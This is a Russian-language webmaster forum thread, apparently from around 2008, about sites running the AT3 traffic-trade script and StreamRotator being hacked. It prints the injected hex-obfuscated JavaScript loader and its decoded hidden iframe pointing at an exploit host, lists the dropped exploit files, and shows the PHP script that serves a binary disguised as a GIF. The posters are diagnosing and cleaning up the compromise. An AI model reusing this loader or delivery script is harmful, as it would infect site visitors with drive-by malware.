Похоже, что 16-й билд ат3 такой же дырявый... :(

В общем ситуация такая же, как и в прошлые разы... backup.php появляется, меняется темплейт и несколько пхп файлов - вставляется кодированный ифрейм... на всех сиджах на серваке стоял 16-й билд под федору 5... фтп тока на мой айпи настроен, так что этот вариант исключается, ssh - тоже... x2.cgi не был заблочен, 12 обращений к нему в логах с айпи 195.5.116.250... сейчас x2.cgi заблочил, поглядим что будет...

ну и самое интересное... код ифрейма:

Код:

<script> var s='3C696672616D65207372633D22687474703A2F2F616D61746575727570736B697274732E696E666F2F73722F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

после перекодировки получаем:

Код:

<iframe src="http://amateurupskirts.info/sr/z/static.php" width=2 height=2 style="display:none"></iframe>

сидж товарисча pns, который вот тут утверждает, что инфо домены лучче всех - Как народ относится к зоне .info?

по приведенному топику очень похоже на подставу, но чем черт не шутит... ... в общем очень бы хотелось услышать каментов от товарисча pns

срочно разбираюсь..

....

первые итоги.

Этот "вирус" создаёт каталог с именем "z" в дире sr
и файлы backup.php backups.php в корне каталога sr .

Внутри z лежит следующее:

Код:

-rw-r--r-- 1   1879 May 11  2006 Installer.class -rw-r--r-- 1  25681 May 11  2006 MagicApplet.class -rw-r--r-- 1   8298 Oct 31 09:27 OP.jar -rw-r--r-- 1    994 May 11  2006 OwnClassLoader.class -rw-r--r-- 1    352 May 11  2006 ProxyClassLoader.class -rw-r--r-- 1  31142 Jan  3 11:19 __ex.log -rw-r--r-- 1  92202 Jan  3 11:19 __in.log -rw-r--r-- 1    827 Oct 31 09:27 animan.class drwxr-xr-x 3   4096 Nov 17 08:06 com -rw-r--r-- 1  34049 Dec 29 10:59 ex.html -rw-r--r-- 1    321 Dec 29 23:15 ex.php -rw-r--r-- 1  14688 Oct 31 09:27 ms03011.jar -rw-r--r-- 1   2407 Oct 31 09:27 omfg.class -rw-r--r-- 1  38903 Jan  2 15:01 static.php

Полный код ex.php

Код:

$size = filesize('ex.html'); header("Content-Length: $size"); header("Content-Type: image/gif"); $fp=fopen('ex.html','rb'); $var = fread($fp,filesize('ex.html')); echo $var; fclose($fp); mylog('__ex.log','*'); exit; function mylog($fname,$text) { $fp=fopen($fname,"a"); fwrite($fp,$text); fclose($fp); } ?>

В ex.html лежит бинарник под MSDOS -- это файл, видно, и выкачивают на комп юзера с зараженной веб-страницы.

Последний раз редактировалось: pns (03/01/08 в 14:32), всего редактировалось 1 раз

не поленитесь, отпишите владельцу хоста, с айпи которого всех поломали - http://esthost.eu/rus/contact/

пысы: к scr хост не имеет отношения...

pns писал:

срочно разбираюсь..

ищи в логах домена обращения к x2.cgi

ну и кого ломали раньше, не поленитесь сделайте комманды

locate backup.php
locate static.php

потому как походу наличие файла backup.php позволяет ломать даже с заблоченым х2... да и кладет его пидарасина теперь не в корень...

вот оно где зарыто!

конечно: в корне все backup.php поудалял, а в бэкапах streamrotator они остались, да ещё в -цати экземплярах по числу бэкапов.

locate ничего не нашёл, зато поиск в mc выискал всех уродов.

StreamRotator в аминке в меню backup указывает на неверные бэкапы, как "corrupted".

Удобнее всего пройтись по админкам всех стримов и вручную удались все бэкапы за предыдущие периоды.
Потом убедиться в том, что *сейчас* в каталоге sr/ ничего чужеродного нет, и создать бэкап вручную.

Оффтоп: Гмм... господа at3 гавно скрипт, помоему это давно очевидно.

А не http://web.compic.ee/ru/ принадлежит 195.5.116.250 айпи?
Давайте не поленимся абузу накатаем, я это уже сделал..

MaxLester писал:

Оффтоп: Гмм... господа at3 гавно скрипт, помоему это давно очевидно.

Проблема в том, что это далеко не оффтоп.

вот тебе оффтоп: microsoft windows дыряв сколько уже десятков лет, как минное поле в войну, но юзали, юзают и будут юзать и дальше.

уже сколько раз сказано: массово популярный софт в первую очередь подвежен хакингу.


вопрос не в конкретных дырах софта, а в тенденции.
Представим, что лёгкие дыры в ATL3/ATX закрыли. Куда хакеры двинуться? В сторону тех скриптов, которые сейчас на фоне AT выглядят "надёжными". И превратятся тогда "надёжные" в "гов#$%енные".

Цитата:

Тема: Похоже, что 16-й билд ат3 такой же дырявый... :(

я как юзал билд 10 (на многих сайтах) так и юзаю...... и похуй мне на всех хакеров... сломать могут любого лишбы желание было :)

pns писал:

вот тебе оффтоп: microsoft windows дыряв сколько уже десятков лет, как минное поле в войну, но юзали, юзают и будут юзать и дальше. уже сколько раз сказано: массово популярный софт в первую очередь подвежен хакингу.

Кто сказал, что бесполезно биться головой об стену ?
Софт надо писать качественный. Тот кто считает, что это невозможно - просто не умеет этого делать.
Я бы вообще не преследовал хакеров. Если Ваш софт падает от "наездов" - виноват программер, а не кто-то ещё. Вся борьба с хакерами адвертится и финансируется бездарями вроде микрософта, которые продают некачественный софт и пытаются переложить ответственность на кого-то.

У меня тоже с 16 проблема. Прочитал тему и полез смотреть, вижу в sr папке backup.php который сканит все файлы, но на этом вроде все.

Взлом сегодня, судя по дате. Логов нет...

Блять, опять закрывать форму?

Кстати, если дело только в скрипте сабмита, то мож его просто переделать самим ? формат базы трейдеров известен ?

Да, формат известен, все открыто. Надо посмотреть, реально ли это

У меня ссылка в iframe на такойже static.php только лежит он на 15den.com

У меня осталось три копии ат3 и одна атх. Ничего не сломали слава яйцам. Хотя там htaccess были. Завтра встану и все переведу на другие скрипты. Как бы не хвалили его почитатели и не защищали, но настоебенило уже.

Такое чуство что все превратились в амеров и читают в однозадачном режиме только последний пост. Глухой телефон блин.

Для истериков:

pns писал:

вот оно где зарыто! конечно: в корне все backup.php поудалял, а в бэкапах streamrotator они остались, да ещё в -цати экземплярах по числу бэкапов. locate ничего не нашёл, зато поиск в mc выискал всех уродов. StreamRotator в аминке в меню backup указывает на неверные бэкапы, как "corrupted". Удобнее всего пройтись по админкам всех стримов и вручную удались все бэкапы за предыдущие периоды. Потом убедиться в том, что *сейчас* в каталоге sr/ ничего чужеродного нет, и создать бэкап вручную.

pns сам оставил дыру еще с прошлого раза.

Sha писал:

Софт надо писать качественный. Тот кто считает, что это невозможно - просто не умеет этого делать.

Ты бредишь - ломается все, а то что особенно актуально ломается очень, очень быстро. Разуй глаза.

doomed писал:

Такое чуство что все превратились в амеров и читают в однозадачном режиме только последний пост. Глухой телефон блин. pns сам оставил дыру еще с прошлого раза.

Тоесть, меня, тупого амера, сломали из-за того что pns оставил у себя в бэкапах эксп? ;)

sir.korvin писал:

Тоесть, меня, тупого амера, сломали из-за того что pns оставил у себя в бэкапах эксп? ;)

Сдесь где-то есть упоминание тебя?
А уж почему тебя сломали - это к телепатам, от тебя никакой информации "почему, как и когда" пока не вижу (как и от Doctor впрочем, кроме той, что его опять сломали).

Twich писал:

Ты бредишь - ломается все, а то что особенно актуально ломается очень, очень быстро. Разуй глаза.

И нормальную валидацию форм сделать тяжело уже после первого взлома? То что там с тире так это вообще маразм.

А никто не заметил что у всех кого поламали стоит стрим ротатор?
Так что может не туда капаем а?

Но запросы шли на файлы at3 а не стрима.

а чего стоит, заменить фаил at (через стрим) и потом его запрашивать, что бы было без палева?